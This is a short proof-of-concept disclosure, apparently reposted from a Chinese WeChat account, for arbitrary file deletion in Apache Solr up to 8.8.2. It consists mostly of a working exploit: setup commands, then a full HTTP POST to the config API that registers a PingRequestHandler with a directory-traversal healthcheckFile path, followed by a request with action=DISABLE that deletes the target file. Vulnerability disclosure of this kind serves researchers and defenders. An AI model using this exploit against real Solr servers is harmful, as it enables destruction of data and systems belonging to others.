1.Download the latest version
https://apache.claz.org/lucene/solr/8.8.2/solr-8.8.2.tgz
2.Starting program
For convenience, I decided to use sample files for demonstration
solr.cmd -f -e dih
restart solr
solr.cmd -f -a "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=10010" -port 8983 -s "C:Solrsolr-8.8.0exampleexample-DIHsolr"
3.POC
step1:
Create a new file(aaa.txt) in the root directory(C:aaa.txt)
step2:
new a requesthandler
POST /solr/db/config HTTP/1.1
Host: 192.168.33.130:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-type:application/json
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 218
{
"add-requesthandler": {
"name": "/testping",
"class":"solr.PingRequestHandler",
"defaults":{"echoParams":"explicit"},
"healthcheckFile":"../../../../../../../../../../../../../aaa.txt",
}
}
step3:
Check whether the creation is successful
http://192.168.33.130:8983/solr/db/config/overlay?omitHeader=true
step4:
visit url: http://192.168.33.130:8983/solr/db/testping?action=DISABLE
File deleted successfully
4.Source code in question
org.apache.solr.handler.PingRequestHandler
原文始发于微信公众号(赛博少女):Apache Solr<= 8.8.2 (最新) 任意文件删除
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论